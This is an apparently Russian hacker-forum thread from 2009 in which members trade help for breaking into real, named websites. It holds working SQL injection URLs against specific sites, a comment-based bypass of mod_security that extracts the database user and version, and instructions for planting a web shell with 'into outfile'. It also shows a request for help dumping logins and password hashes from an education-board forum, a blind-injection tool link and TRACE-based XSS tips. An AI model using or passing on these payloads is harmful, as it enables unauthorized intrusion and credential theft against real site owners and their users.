Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    Почему-то отрезать лишнее комментарии не получается, но можно и по другому модифицировать запрос.
    http://www.e3e5.com/articles.php?section=-12))+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+sections_captions+where+((1=1
    подобрать нужную таблицу не удалось. Решил поискать более подходящий инъект. Нашел этот
    http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+author+where+((1=1
    2 скл запроса =/ Вывод сделать врядли получится. Но можно воспользоваться аналогом "more that 1 row".
    http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+author+where+((1=(select+1,2)+
    Но это ты уж сам. Удачи ;)
     
    3 people like this.
  2. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    #7102 laedafess, 16 May 2009
    Last edited: 16 May 2009
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://pashkela.narod.ru/progi/bsqlbf-v2.1.zip
     
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Pashkela, синтаксис я знаю, уже почти на каждом "хэк"-портале статтейку прочитал.
    laedafess, спс...
     
  5. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    Союственно и вопрос, как подобрать, все работает но на Юнионе рубает
     
  6. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    http://www.strongcube.com/download.php?product=-2+union/**/select+concat_ws(0x3a,user(),database(),version()),2,3

    Просто какой-то мод (mod_security) если видит union+select в запросе, тогда Forbidden
     
    1 person likes this.
  7. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Можите потсказать, как можно залить шелл через SQL inj?
    version- 5
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    через into outfile
     
  9. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Пример можете показать :confused:
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    select '<?phpinfo()?>' into outfile '/tmp/shell.php'
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    если union select file_priv from mysql.user

    будет "y"
     
  12. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    уважаемые, подскажите, какую именно XSS атаку можно провести на ресурс, если на нем доступен метод TRACE ( Может быть, на конкретных примерах)
     
  13. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Ты все же решил проигнорировать наш совет насчет сканеров уязвимостей да ? Вот спросил бы у разработчика хспайдера какую там атаку он хотел провести и много ли раз у него это получалось :/

    http://www.inattack.ru/article/516.html пункт 3 XSS-нападения методом TRACE.
     
    1 person likes this.
  14. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    вот от нечего делать нашел скулю на сайте московского образования: http://forum.mioo.ru/ege2010/rt1.php?firstrow=20'
    Но дальше раскрутить никак не могу, даже подобрать столбцы не удается. Если кому то интересно, поvогите, расскажите как раскрутить дальше до вида login ; md5 PASS
     
  15. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    jecka3000, там инъекия в limit'e, так что забудь про эту скулю. Ищи другие.
     
  16. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    jecka3000 не смотрел но если oRb прав то вот :
    http://www.securitylab.ru/contest/212083.php - есть пункт про иньекцию в лимите
    http://forum.antichat.ru/showthread.php?t=56446 - просто тема про иньекцию в лимите
     
    2 people like this.
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    есть ли генератор на php
    в который ввел значение типа "pg_users"
    А она тебе примерно это

    chr(111)||chr(110)||chr(97)

    ?
     
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    это тебе к кодерам надо обратиться...
     
    _________________________
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    diznt, стукни в аську мне, 674542, накатаю.
     
  20. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Если нужно на js - могу поделиться.
     
Thread Status:
Not open for further replies.